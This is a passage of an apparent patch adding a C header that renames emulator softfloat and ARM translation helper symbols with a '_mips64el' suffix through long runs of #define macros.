float64_is_any_nan float64_is_any_nan_mips64el +#define float64_is_infinity float64_is_infinity_mips64el +#define float64_is_neg float64_is_neg_mips64el +#define float64_is_quiet_nan float64_is_quiet_nan_mips64el +#define float64_is_signaling_nan float64_is_signaling_nan_mips64el +#define float64_is_zero float64_is_zero_mips64el +#define float64_le float64_le_mips64el +#define float64_le_quiet float64_le_quiet_mips64el 
+#define float64_log2 float64_log2_mips64el +#define float64_lt float64_lt_mips64el +#define float64_lt_quiet float64_lt_quiet_mips64el +#define float64_max float64_max_mips64el +#define float64_maxnum float64_maxnum_mips64el +#define float64_maxnummag float64_maxnummag_mips64el +#define float64_maybe_silence_nan float64_maybe_silence_nan_mips64el +#define float64_min float64_min_mips64el +#define float64_minmax float64_minmax_mips64el +#define float64_minnum float64_minnum_mips64el +#define float64_minnummag float64_minnummag_mips64el +#define float64_mul float64_mul_mips64el +#define float64_muladd float64_muladd_mips64el +#define float64_rem float64_rem_mips64el +#define float64_round_to_int float64_round_to_int_mips64el +#define float64_scalbn float64_scalbn_mips64el +#define float64_set_sign float64_set_sign_mips64el +#define float64_sqrt float64_sqrt_mips64el +#define float64_squash_input_denormal float64_squash_input_denormal_mips64el +#define float64_sub float64_sub_mips64el +#define float64ToCommonNaN float64ToCommonNaN_mips64el +#define float64_to_float128 float64_to_float128_mips64el +#define float64_to_float16 float64_to_float16_mips64el +#define float64_to_float32 float64_to_float32_mips64el +#define float64_to_floatx80 float64_to_floatx80_mips64el +#define float64_to_int16 float64_to_int16_mips64el +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_mips64el +#define float64_to_int32 float64_to_int32_mips64el +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_mips64el +#define float64_to_int64 float64_to_int64_mips64el +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_mips64el +#define float64_to_uint16 float64_to_uint16_mips64el +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_mips64el +#define float64_to_uint32 float64_to_uint32_mips64el +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_mips64el +#define float64_to_uint64 
float64_to_uint64_mips64el +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_mips64el +#define float64_trunc_to_int float64_trunc_to_int_mips64el +#define float64_unordered float64_unordered_mips64el +#define float64_unordered_quiet float64_unordered_quiet_mips64el +#define float_raise float_raise_mips64el +#define floatx80_add floatx80_add_mips64el +#define floatx80_compare floatx80_compare_mips64el +#define floatx80_compare_internal floatx80_compare_internal_mips64el +#define floatx80_compare_quiet floatx80_compare_quiet_mips64el +#define floatx80_default_nan floatx80_default_nan_mips64el +#define floatx80_div floatx80_div_mips64el +#define floatx80_eq floatx80_eq_mips64el +#define floatx80_eq_quiet floatx80_eq_quiet_mips64el +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_mips64el +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_mips64el +#define floatx80_le floatx80_le_mips64el +#define floatx80_le_quiet floatx80_le_quiet_mips64el +#define floatx80_lt floatx80_lt_mips64el +#define floatx80_lt_quiet floatx80_lt_quiet_mips64el +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_mips64el +#define floatx80_mul floatx80_mul_mips64el +#define floatx80_rem floatx80_rem_mips64el +#define floatx80_round_to_int floatx80_round_to_int_mips64el +#define floatx80_scalbn floatx80_scalbn_mips64el +#define floatx80_sqrt floatx80_sqrt_mips64el +#define floatx80_sub floatx80_sub_mips64el +#define floatx80ToCommonNaN floatx80ToCommonNaN_mips64el +#define floatx80_to_float128 floatx80_to_float128_mips64el +#define floatx80_to_float32 floatx80_to_float32_mips64el +#define floatx80_to_float64 floatx80_to_float64_mips64el +#define floatx80_to_int32 floatx80_to_int32_mips64el +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_mips64el +#define floatx80_to_int64 floatx80_to_int64_mips64el +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_mips64el +#define floatx80_unordered 
floatx80_unordered_mips64el +#define floatx80_unordered_quiet floatx80_unordered_quiet_mips64el +#define flush_icache_range flush_icache_range_mips64el +#define format_string format_string_mips64el +#define fp_decode_rm fp_decode_rm_mips64el +#define frame_dummy frame_dummy_mips64el +#define free_range free_range_mips64el +#define fstat64 fstat64_mips64el +#define futex_wait futex_wait_mips64el +#define futex_wake futex_wake_mips64el +#define gen_aa32_ld16s gen_aa32_ld16s_mips64el +#define gen_aa32_ld16u gen_aa32_ld16u_mips64el +#define gen_aa32_ld32u gen_aa32_ld32u_mips64el +#define gen_aa32_ld64 gen_aa32_ld64_mips64el +#define gen_aa32_ld8s gen_aa32_ld8s_mips64el +#define gen_aa32_ld8u gen_aa32_ld8u_mips64el +#define gen_aa32_st16 gen_aa32_st16_mips64el +#define gen_aa32_st32 gen_aa32_st32_mips64el +#define gen_aa32_st64 gen_aa32_st64_mips64el +#define gen_aa32_st8 gen_aa32_st8_mips64el +#define gen_adc gen_adc_mips64el +#define gen_adc_CC gen_adc_CC_mips64el +#define gen_add16 gen_add16_mips64el +#define gen_add_carry gen_add_carry_mips64el +#define gen_add_CC gen_add_CC_mips64el +#define gen_add_datah_offset gen_add_datah_offset_mips64el +#define gen_add_data_offset gen_add_data_offset_mips64el +#define gen_addq gen_addq_mips64el +#define gen_addq_lo gen_addq_lo_mips64el +#define gen_addq_msw gen_addq_msw_mips64el +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_mips64el +#define gen_arm_shift_im gen_arm_shift_im_mips64el +#define gen_arm_shift_reg gen_arm_shift_reg_mips64el +#define gen_bx gen_bx_mips64el +#define gen_bx_im gen_bx_im_mips64el +#define gen_clrex gen_clrex_mips64el +#define generate_memory_topology generate_memory_topology_mips64el +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_mips64el +#define gen_exception gen_exception_mips64el +#define gen_exception_insn gen_exception_insn_mips64el +#define gen_exception_internal gen_exception_internal_mips64el +#define gen_exception_internal_insn gen_exception_internal_insn_mips64el 
+#define gen_exception_return gen_exception_return_mips64el +#define gen_goto_tb gen_goto_tb_mips64el +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_mips64el +#define gen_helper_add_saturate gen_helper_add_saturate_mips64el +#define gen_helper_add_setq gen_helper_add_setq_mips64el +#define gen_helper_clear_pstate_ss gen_helper_clear_pstate_ss_mips64el +#define gen_helper_clz32 gen_helper_clz32_mips64el +#define gen_helper_clz64 gen_helper_clz64_mips64el +#define gen_helper_clz_arm gen_helper_clz_arm_mips64el +#define gen_helper_cpsr_read gen_helper_cpsr_read_mips64el +#define gen_helper_cpsr_write gen_helper_cpsr_write_mips64el +#define gen_helper_crc32_arm gen_helper_crc32_arm_mips64el +#define gen_helper_crc32c gen_helper_crc32c_mips64el +#define gen_helper_crypto_aese gen_helper_crypto_aese_mips64el +#define gen_helper_crypto_aesmc gen_helper_crypto_aesmc_mips64el +#define gen_helper_crypto_sha1_3reg gen_helper_crypto_sha1_3reg_mips64el +#define gen_helper_crypto_sha1h gen_helper_crypto_sha1h_mips64el +#define gen_helper_crypto_sha1su1 gen_helper_crypto_sha1su1_mips64el +#define gen_helper_crypto_sha256h gen_helper_crypto_sha256h_mips64el +#define gen_helper_crypto_sha256h2 gen_helper_crypto_sha256h2_mips64el +#define gen_helper_crypto_sha256su0 gen_helper_crypto_sha256su0_mips64el +#define gen_helper_crypto_sha256su1 gen_helper_crypto_sha256su1_mips64el +#define gen_helper_double_saturate gen_helper_double_saturate_mips64el +#define gen_helper_exception_internal gen_helper_exception_internal_mips64el +#define gen_helper_exception_with_syndrome gen_helper_exception_with_syndrome_mips64el +#define gen_helper_get_cp_reg gen_helper_get_cp_reg_mips64el +#define gen_helper_get_cp_reg64 gen_helper_get_cp_reg64_mips64el +#define gen_helper_get_r13_banked gen_helper_get_r13_banked_mips64el +#define gen_helper_get_user_reg gen_helper_get_user_reg_mips64el +#define gen_helper_iwmmxt_addcb gen_helper_iwmmxt_addcb_mips64el +#define 
gen_helper_iwmmxt_addcl gen_helper_iwmmxt_addcl_mips64el +#define gen_helper_iwmmxt_addcw gen_helper_iwmmxt_addcw_mips64el +#define gen_helper_iwmmxt_addnb gen_helper_iwmmxt_addnb_mips64el +#define gen_helper_iwmmxt_addnl gen_helper_iwmmxt_addnl_mips64el +#define gen_helper_iwmmxt_addnw gen_helper_iwmmxt_addnw_mips64el +#define gen_helper_iwmmxt_addsb gen_helper_iwmmxt_addsb_mips64el +#define gen_helper_iwmmxt_addsl gen_helper_iwmmxt_addsl_mips64el +#define gen_helper_iwmmxt_addsw gen_helper_iwmmxt_addsw_mips64el +#define gen_helper_iwmmxt_addub gen_helper_iwmmxt_addub_mips64el +#define gen_helper_iwmmxt_addul gen_helper_iwmmxt_addul_mips64el +#define gen_helper_iwmmxt_adduw gen_helper_iwmmxt_adduw_mips64el +#define gen_helper_iwmmxt_align gen_helper_iwmmxt_align_mips64el +#define gen_helper_iwmmxt_avgb0 gen_helper_iwmmxt_avgb0_mips64el +#define gen_helper_iwmmxt_avgb1 gen_helper_iwmmxt_avgb1_mips64el +#define gen_helper_iwmmxt_avgw0 gen_helper_iwmmxt_avgw0_mips64el +#define gen_helper_iwmmxt_avgw1 gen_helper_iwmmxt_avgw1_mips64el +#define gen_helper_iwmmxt_bcstb gen_helper_iwmmxt_bcstb_mips64el +#define gen_helper_iwmmxt_bcstl gen_helper_iwmmxt_bcstl_mips64el +#define gen_helper_iwmmxt_bcstw gen_helper_iwmmxt_bcstw_mips64el +#define gen_helper_iwmmxt_cmpeqb gen_helper_iwmmxt_cmpeqb_mips64el +#define gen_helper_iwmmxt_cmpeql gen_helper_iwmmxt_cmpeql_mips64el +#define gen_helper_iwmmxt_cmpeqw gen_helper_iwmmxt_cmpeqw_mips64el +#define gen_helper_iwmmxt_cmpgtsb gen_helper_iwmmxt_cmpgtsb_mips64el +#define gen_helper_iwmmxt_cmpgtsl gen_helper_iwmmxt_cmpgtsl_mips64el +#define gen_helper_iwmmxt_cmpgtsw gen_helper_iwmmxt_cmpgtsw_mips64el +#define gen_helper_iwmmxt_cmpgtub gen_helper_iwmmxt_cmpgtub_mips64el +#define gen_helper_iwmmxt_cmpgtul gen_helper_iwmmxt_cmpgtul_mips64el +#define gen_helper_iwmmxt_cmpgtuw gen_helper_iwmmxt_cmpgtuw_mips64el +#define gen_helper_iwmmxt_insr gen_helper_iwmmxt_insr_mips64el +#define gen_helper_iwmmxt_macsw gen_helper_iwmmxt_macsw_mips64el 
+#define gen_helper_iwmmxt_macuw gen_helper_iwmmxt_macuw_mips64el +#define gen_helper_iwmmxt_maddsq gen_helper_iwmmxt_maddsq_mips64el +#define gen_helper_iwmmxt_madduq gen_helper_iwmmxt_madduq_mips64el +#define gen_helper_iwmmxt_maxsb gen_helper_iwmmxt_maxsb_mips64el +#define gen_helper_iwmmxt_maxsl gen_helper_iwmmxt_maxsl_mips64el +#define gen_helper_iwmmxt_maxsw gen_helper_iwmmxt_maxsw_mips64el +#define gen_helper_iwmmxt_maxub gen_helper_iwmmxt_maxub_mips64el +#define gen_helper_iwmmxt_maxul gen_helper_iwmmxt_maxul_mips64el +#define gen_helper_iwmmxt_maxuw gen_helper_iwmmxt_maxuw_mips64el +#define gen_helper_iwmmxt_minsb gen_helper_iwmmxt_minsb_mips64el +#define gen_helper_iwmmxt_minsl gen_helper_iwmmxt_minsl_mips64el +#define gen_helper_iwmmxt_minsw gen_helper_iwmmxt_minsw_mips64el +#define gen_helper_iwmmxt_minub gen_helper_iwmmxt_minub_mips64el +#define gen_helper_iwmmxt_minul gen_helper_iwmmxt_minul_mips64el +#define gen_helper_iwmmxt_minuw gen_helper_iwmmxt_minuw_mips64el +#define gen_helper_iwmmxt_msbb gen_helper_iwmmxt_msbb_mips64el +#define gen_helper_iwmmxt_msbl gen_helper_iwmmxt_msbl_mips64el +#define gen_helper_iwmmxt_msbw gen_helper_iwmmxt_msbw_mips64el +#define gen_helper_iwmmxt_muladdsl gen_helper_iwmmxt_muladdsl_mips64el +#define gen_helper_iwmmxt_muladdsw gen_helper_iwmmxt_muladdsw_mips64el +#define gen_helper_iwmmxt_muladdswl gen_helper_iwmmxt_muladdswl_mips64el +#define gen_helper_iwmmxt_mulshw gen_helper_iwmmxt_mulshw_mips64el +#define gen_helper_iwmmxt_mulslw gen_helper_iwmmxt_mulslw_mips64el +#define gen_helper_iwmmxt_muluhw gen_helper_iwmmxt_muluhw_mips64el +#define gen_helper_iwmmxt_mululw gen_helper_iwmmxt_mululw_mips64el +#define gen_helper_iwmmxt_packsl gen_helper_iwmmxt_packsl_mips64el +#define gen_helper_iwmmxt_packsq gen_helper_iwmmxt_packsq_mips64el +#define gen_helper_iwmmxt_packsw gen_helper_iwmmxt_packsw_mips64el +#define gen_helper_iwmmxt_packul gen_helper_iwmmxt_packul_mips64el +#define gen_helper_iwmmxt_packuq 
gen_helper_iwmmxt_packuq_mips64el +#define gen_helper_iwmmxt_packuw gen_helper_iwmmxt_packuw_mips64el +#define gen_helper_iwmmxt_rorl gen_helper_iwmmxt_rorl_mips64el +#define gen_helper_iwmmxt_rorq gen_helper_iwmmxt_rorq_mips64el +#define gen_helper_iwmmxt_rorw gen_helper_iwmmxt_rorw_mips64el +#define gen_helper_iwmmxt_sadb gen_helper_iwmmxt_sadb_mips64el +#define gen_helper_iwmmxt_sadw gen_helper_iwmmxt_sadw_mips64el +#define gen_helper_iwmmxt_setpsr_nz gen_helper_iwmmxt_setpsr_nz_mips64el +#define gen_helper_iwmmxt_shufh gen_helper_iwmmxt_shufh_mips64el +#define gen_helper_iwmmxt_slll gen_helper_iwmmxt_slll_mips64el +#define gen_helper_iwmmxt_sllq gen_helper_iwmmxt_sllq_mips64el +#define gen_helper_iwmmxt_sllw gen_helper_iwmmxt_sllw_mips64el +#define gen_helper_iwmmxt_sral gen_helper_iwmmxt_sral_mips64el +#define gen_helper_iwmmxt_sraq gen_helper_iwmmxt_sraq_mips64el +#define gen_helper_iwmmxt_sraw gen_helper_iwmmxt_sraw_mips64el +#define gen_helper_iwmmxt_srll gen_helper_iwmmxt_srll_mips64el +#define gen_helper_iwmmxt_srlq gen_helper_iwmmxt_srlq_mips64el +#define gen_helper_iwmmxt_srlw gen_helper_iwmmxt_srlw_mips64el +#define gen_helper_iwmmxt_subnb gen_helper_iwmmxt_subnb_mips64el +#define gen_helper_iwmmxt_subnl gen_helper_iwmmxt_subnl_mips64el +#define gen_helper_iwmmxt_subnw gen_helper_iwmmxt_subnw_mips64el +#define gen_helper_iwmmxt_subsb gen_helper_iwmmxt_subsb_mips64el +#define gen_helper_iwmmxt_subsl gen_helper_iwmmxt_subsl_mips64el +#define gen_helper_iwmmxt_subsw gen_helper_iwmmxt_subsw_mips64el +#define gen_helper_iwmmxt_subub gen_helper_iwmmxt_subub_mips64el +#define gen_helper_iwmmxt_subul gen_helper_iwmmxt_subul_mips64el +#define gen_helper_iwmmxt_subuw gen_helper_iwmmxt_subuw_mips64el +#define gen_helper_iwmmxt_unpackhb gen_helper_iwmmxt_unpackhb_mips64el +#define gen_helper_iwmmxt_unpackhl gen_helper_iwmmxt_unpackhl_mips64el +#define gen_helper_iwmmxt_unpackhsb gen_helper_iwmmxt_unpackhsb_mips64el +#define gen_helper_iwmmxt_unpackhsl 
gen_helper_iwmmxt_unpackhsl_mips64el +#define gen_helper_iwmmxt_unpackhsw gen_helper_iwmmxt_unpackhsw_mips64el +#define gen_helper_iwmmxt_unpackhub gen_helper_iwmmxt_unpackhub_mips64el +#define gen_helper_iwmmxt_unpackhul gen_helper_iwmmxt_unpackhul_mips64el +#define gen_helper_iwmmxt_unpackhuw gen_helper_iwmmxt_unpackhuw_mips64el +#define gen_helper_iwmmxt_unpackhw gen_helper_iwmmxt_unpackhw_mips64el +#define gen_helper_iwmmxt_unpacklb gen_helper_iwmmxt_unpacklb_mips64el +#define gen_helper_iwmmxt_unpackll gen_helper_iwmmxt_unpackll_mips64el +#define gen_helper_iwmmxt_unpacklsb gen_helper_iwmmxt_unpacklsb_mips64el +#define gen_helper_iwmmxt_unpacklsl gen_helper_iwmmxt_unpacklsl_mips64el +#define gen_helper_iwmmxt_unpacklsw gen_helper_iwmmxt_unpacklsw_mips64el +#define gen_helper_iwmmxt_unpacklub gen_helper_iwmmxt_unpacklub_mips64el +#define gen_helper_iwmmxt_unpacklul gen_helper_iwmmxt_unpacklul_mips64el +#define gen_helper_iwmmxt_unpackluw gen_helper_iwmmxt_unpackluw_mips64el +#define gen_helper_iwmmxt_unpacklw gen_helper_iwmmxt_unpacklw_mips64el +#define gen_helper_neon_abd_f32 gen_helper_neon_abd_f32_mips64el +#define gen_helper_neon_abdl_s16 gen_helper_neon_abdl_s16_mips64el +#define gen_helper_neon_abdl_s32 gen_helper_neon_abdl_s32_mips64el +#define gen_helper_neon_abdl_s64 gen_helper_neon_abdl_s64_mips64el +#define gen_helper_neon_abdl_u16 gen_helper_neon_abdl_u16_mips64el +#define gen_helper_neon_abdl_u32 gen_helper_neon_abdl_u32_mips64el +#define gen_helper_neon_abdl_u64 gen_helper_neon_abdl_u64_mips64el +#define gen_helper_neon_abd_s16 gen_helper_neon_abd_s16_mips64el +#define gen_helper_neon_abd_s32 gen_helper_neon_abd_s32_mips64el +#define gen_helper_neon_abd_s8 gen_helper_neon_abd_s8_mips64el +#define gen_helper_neon_abd_u16 gen_helper_neon_abd_u16_mips64el +#define gen_helper_neon_abd_u32 gen_helper_neon_abd_u32_mips64el +#define gen_helper_neon_abd_u8 gen_helper_neon_abd_u8_mips64el +#define gen_helper_neon_abs_s16 gen_helper_neon_abs_s16_mips64el 
+#define gen_helper_neon_abs_s8 gen_helper_neon_abs_s8_mips64el +#define gen_helper_neon_acge_f32 gen_helper_neon_acge_f32_mips64el +#define gen_helper_neon_acgt_f32 gen_helper_neon_acgt_f32_mips64el +#define gen_helper_neon_addl_saturate_s32 gen_helper_neon_addl_saturate_s32_mips64el +#define gen_helper_neon_addl_saturate_s64 gen_helper_neon_addl_saturate_s64_mips64el +#define gen_helper_neon_addl_u16 gen_helper_neon_addl_u16_mips64el +#define gen_helper_neon_addl_u32 gen_helper_neon_addl_u32_mips64el +#define gen_helper_neon_add_u16 gen_helper_neon_add_u16_mips64el +#define gen_helper_neon_add_u8 gen_helper_neon_add_u8_mips64el +#define gen_helper_neon_ceq_f32 gen_helper_neon_ceq_f32_mips64el +#define gen_helper_neon_ceq_u16 gen_helper_neon_ceq_u16_mips64el +#define gen_helper_neon_ceq_u32 gen_helper_neon_ceq_u32_mips64el +#define gen_helper_neon_ceq_u8 gen_helper_neon_ceq_u8_mips64el +#define gen_helper_neon_cge_f32 gen_helper_neon_cge_f32_mips64el +#define gen_helper_neon_cge_s16 gen_helper_neon_cge_s16_mips64el +#define gen_helper_neon_cge_s32 gen_helper_neon_cge_s32_mips64el +#define gen_helper_neon_cge_s8 gen_helper_neon_cge_s8_mips64el +#define gen_helper_neon_cge_u16 gen_helper_neon_cge_u16_mips64el +#define gen_helper_neon_cge_u32 gen_helper_neon_cge_u32_mips64el +#define gen_helper_neon_cge_u8 gen_helper_neon_cge_u8_mips64el +#define gen_helper_neon_cgt_f32 gen_helper_neon_cgt_f32_mips64el +#define gen_helper_neon_cgt_s16 gen_helper_neon_cgt_s16_mips64el +#define gen_helper_neon_cgt_s32 gen_helper_neon_cgt_s32_mips64el +#define gen_helper_neon_cgt_s8 gen_helper_neon_cgt_s8_mips64el +#define gen_helper_neon_cgt_u16 gen_helper_neon_cgt_u16_mips64el +#define gen_helper_neon_cgt_u32 gen_helper_neon_cgt_u32_mips64el +#define gen_helper_neon_cgt_u8 gen_helper_neon_cgt_u8_mips64el +#define gen_helper_neon_cls_s16 gen_helper_neon_cls_s16_mips64el +#define gen_helper_neon_cls_s32 gen_helper_neon_cls_s32_mips64el +#define gen_helper_neon_cls_s8 
gen_helper_neon_cls_s8_mips64el +#define gen_helper_neon_clz_u16 gen_helper_neon_clz_u16_mips64el +#define gen_helper_neon_clz_u8 gen_helper_neon_clz_u8_mips64el +#define gen_helper_neon_cnt_u8 gen_helper_neon_cnt_u8_mips64el +#define gen_helper_neon_fcvt_f16_to_f32 gen_helper_neon_fcvt_f16_to_f32_mips64el +#define gen_helper_neon_fcvt_f32_to_f16 gen_helper_neon_fcvt_f32_to_f16_mips64el +#define gen_helper_neon_hadd_s16 gen_helper_neon_hadd_s16_mips64el +#define gen_helper_neon_hadd_s32 gen_helper_neon_hadd_s32_mips64el +#define gen_helper_neon_hadd_s8 gen_helper_neon_hadd_s8_mips64el +#define gen_helper_neon_hadd_u16 gen_helper_neon_hadd_u16_mips64el +#define gen_helper_neon_hadd_u32 gen_helper_neon_hadd_u32_mips64el +#define gen_helper_neon_hadd_u8 gen_helper_neon_hadd_u8_mips64el +#define gen_helper_neon_hsub_s16 gen_helper_neon_hsub_s16_mips64el +#define gen_helper_neon_hsub_s32 gen_helper_neon_hsub_s32_mips64el +#define gen_helper_neon_hsub_s8 gen_helper_neon_hsub_s8_mips64el +#define gen_helper_neon_hsub_u16 gen_helper_neon_hsub_u16_mips64el +#define gen_helper_neon_hsub_u32 gen_helper_neon_hsub_u32_mips64el +#define gen_helper_neon_hsub_u8 gen_helper_neon_hsub_u8_mips64el +#define gen_helper_neon_max_s16 gen_helper_neon_max_s16_mips64el +#define gen_helper_neon_max_s32 gen_helper_neon_max_s32_mips64el +#define gen_helper_neon_max_s8 gen_helper_neon_max_s8_mips64el +#define gen_helper_neon_max_u16 gen_helper_neon_max_u16_mips64el +#define gen_helper_neon_max_u32 gen_helper_neon_max_u32_mips64el +#define gen_helper_neon_max_u8 gen_helper_neon_max_u8_mips64el +#define gen_helper_neon_min_s16 gen_helper_neon_min_s16_mips64el +#define gen_helper_neon_min_s32 gen_helper_neon_min_s32_mips64el +#define gen_helper_neon_min_s8 gen_helper_neon_min_s8_mips64el +#define gen_helper_neon_min_u16 gen_helper_neon_min_u16_mips64el +#define gen_helper_neon_min_u32 gen_helper_neon_min_u32_mips64el +#define gen_helper_neon_min_u8 gen_helper_neon_min_u8_mips64el +#define 
gen_helper_neon_mull_p8 gen_helper_neon_mull_p8_mips64el +#define gen_helper_neon_mull_s16 gen_helper_neon_mull_s16_mips64el +#define gen_helper_neon_mull_s8 gen_helper_neon_mull_s8_mips64el +#define gen_helper_neon_mull_u16 gen_helper_neon_mull_u16_mips64el +#define gen_helper_neon_mull_u8 gen_helper_neon_mull_u8_mips64el +#define gen_helper_neon_mul_p8 gen_helper_neon_mul_p8_mips64el +#define gen_helper_neon_mul_u16 gen_helper_neon_mul_u16_mips64el +#define gen_helper_neon_mul_u8 gen_helper_neon_mul_u8_mips64el +#define gen_helper_neon_narrow_high_u16 gen_helper_neon_narrow_high_u16_mips64el +#define gen_helper_neon_narrow_high_u8 gen_helper_neon_narrow_high_u8_mips64el +#define gen_helper_neon_narrow_round_high_u16 gen_helper_neon_narrow_round_high_u16_mips64el +#define gen_helper_neon_narrow_round_high_u8 gen_helper_neon_narrow_round_high_u8_mips64el +#define gen_helper_neon_narrow_sat_s16 gen_helper_neon_narrow_sat_s16_mips64el +#define gen_helper_neon_narrow_sat_s32 gen_helper_neon_narrow_sat_s32_mips64el +#define gen_helper_neon_narrow_sat_s8 gen_helper_neon_narrow_sat_s8_mips64el +#define gen_helper_neon_narrow_sat_u16 gen_helper_neon_narrow_sat_u16_mips64el +#define gen_helper_neon_narrow_sat_u32 gen_helper_neon_narrow_sat_u32_mips64el +#define gen_helper_neon_narrow_sat_u8 gen_helper_neon_narrow_sat_u8_mips64el +#define gen_helper_neon_narrow_u16 gen_helper_neon_narrow_u16_mips64el +#define gen_helper_neon_narrow_u8 gen_helper_neon_narrow_u8_mips64el +#define gen_helper_neon_negl_u16 gen_helper_neon_negl_u16_mips64el +#define gen_helper_neon_negl_u32 gen_helper_neon_negl_u32_mips64el +#define gen_helper_neon_paddl_u16 gen_helper_neon_paddl_u16_mips64el +#define gen_helper_neon_paddl_u32 gen_helper_neon_paddl_u32_mips64el +#define gen_helper_neon_padd_u16 gen_helper_neon_padd_u16_mips64el +#define gen_helper_neon_padd_u8 gen_helper_neon_padd_u8_mips64el +#define gen_helper_neon_pmax_s16 gen_helper_neon_pmax_s16_mips64el +#define gen_helper_neon_pmax_s8 
gen_helper_neon_pmax_s8_mips64el +#define gen_helper_neon_pmax_u16 gen_helper_neon_pmax_u16_mips64el +#define gen_helper_neon_pmax_u8 gen_helper_neon_pmax_u8_mips64el +#define gen_helper_neon_pmin_s16 gen_helper_neon_pmin_s16_mips64el +#define gen_helper_neon_pmin_s8 gen_helper_neon_pmin_s8_mips64el +#define gen_helper_neon_pmin_u16 gen_helper_neon_pmin_u16_mips64el +#define gen_helper_neon_pmin_u8 gen_helper_neon_pmin_u8_mips64el +#define gen_helper_neon_pmull_64_hi gen_helper_neon_pmull_64_hi_mips64el +#define gen_helper_neon_pmull_64_lo gen_helper_neon_pmull_64_lo_mips64el +#define gen_helper_neon_qabs_s16 gen_helper_neon_qabs_s16_mips64el +#define gen_helper_neon_qabs_s32 gen_helper_neon_qabs_s32_mips64el +#define gen_helper_neon_qabs_s8 gen_helper_neon_qabs_s8_mips64el +#define gen_helper_neon_qadd_s16 gen_helper_neon_qadd_s16_mips64el +#define gen_helper_neon_qadd_s32 gen_helper_neon_qadd_s32_mips64el +#define gen_helper_neon_qadd_s64 gen_helper_neon_qadd_s64_mips64el +#define gen_helper_neon_qadd_s8 gen_helper_neon_qadd_s8_mips64el +#define gen_helper_neon_qadd_u16 gen_helper_neon_qadd_u16_mips64el +#define gen_helper_neon_qadd_u32 gen_helper_neon_qadd_u32_mips64el +#define gen_helper_neon_qadd_u64 gen_helper_neon_qadd_u64_mips64el +#define gen_helper_neon_qadd_u8 gen_helper_neon_qadd_u8_mips64el +#define gen_helper_neon_qdmulh_s16 gen_helper_neon_qdmulh_s16_mips64el +#define gen_helper_neon_qdmulh_s32 gen_helper_neon_qdmulh_s32_mips64el +#define gen_helper_neon_qneg_s16 gen_helper_neon_qneg_s16_mips64el +#define gen_helper_neon_qneg_s32 gen_helper_neon_qneg_s32_mips64el +#define gen_helper_neon_qneg_s8 gen_helper_neon_qneg_s8_mips64el +#define gen_helper_neon_qrdmulh_s16 gen_helper_neon_qrdmulh_s16_mips64el +#define gen_helper_neon_qrdmulh_s32 gen_helper_neon_qrdmulh_s32_mips64el +#define gen_helper_neon_qrshl_s16 gen_helper_neon_qrshl_s16_mips64el +#define gen_helper_neon_qrshl_s32 gen_helper_neon_qrshl_s32_mips64el +#define gen_helper_neon_qrshl_s64 
gen_helper_neon_qrshl_s64_mips64el +#define gen_helper_neon_qrshl_s8 gen_helper_neon_qrshl_s8_mips64el +#define gen_helper_neon_qrshl_u16 gen_helper_neon_qrshl_u16_mips64el +#define gen_helper_neon_qrshl_u32 gen_helper_neon_qrshl_u32_mips64el +#define gen_helper_neon_qrshl_u64 gen_helper_neon_qrshl_u64_mips64el +#define gen_helper_neon_qrshl_u8 gen_helper_neon_qrshl_u8_mips64el +#define gen_helper_neon_qshl_s16 gen_helper_neon_qshl_s16_mips64el +#define gen_helper_neon_qshl_s32 gen_helper_neon_qshl_s32_mips64el +#define gen_helper_neon_qshl_s64 gen_helper_neon_qshl_s64_mips64el +#define gen_helper_neon_qshl_s8 gen_helper_neon_qshl_s8_mips64el +#define gen_helper_neon_qshl_u16 gen_helper_neon_qshl_u16_mips64el +#define gen_helper_neon_qshl_u32 gen_helper_neon_qshl_u32_mips64el +#define gen_helper_neon_qshl_u64 gen_helper_neon_qshl_u64_mips64el +#define gen_helper_neon_qshl_u8 gen_helper_neon_qshl_u8_mips64el +#define gen_helper_neon_qshlu_s16 gen_helper_neon_qshlu_s16_mips64el +#define gen_helper_neon_qshlu_s32 gen_helper_neon_qshlu_s32_mips64el +#define gen_helper_neon_qshlu_s64 gen_helper_neon_qshlu_s64_mips64el +#define gen_helper_neon_qshlu_s8 gen_helper_neon_qshlu_s8_mips64el +#define gen_helper_neon_qsub_s16 gen_helper_neon_qsub_s16_mips64el +#define gen_helper_neon_qsub_s32 gen_helper_neon_qsub_s32_mips64el +#define gen_helper_neon_qsub_s64 gen_helper_neon_qsub_s64_mips64el +#define gen_helper_neon_qsub_s8 gen_helper_neon_qsub_s8_mips64el +#define gen_helper_neon_qsub_u16 gen_helper_neon_qsub_u16_mips64el +#define gen_helper_neon_qsub_u32 gen_helper_neon_qsub_u32_mips64el +#define gen_helper_neon_qsub_u64 gen_helper_neon_qsub_u64_mips64el +#define gen_helper_neon_qsub_u8 gen_helper_neon_qsub_u8_mips64el +#define gen_helper_neon_qunzip16 gen_helper_neon_qunzip16_mips64el +#define gen_helper_neon_qunzip32 gen_helper_neon_qunzip32_mips64el +#define gen_helper_neon_qunzip8 gen_helper_neon_qunzip8_mips64el +#define gen_helper_neon_qzip16 
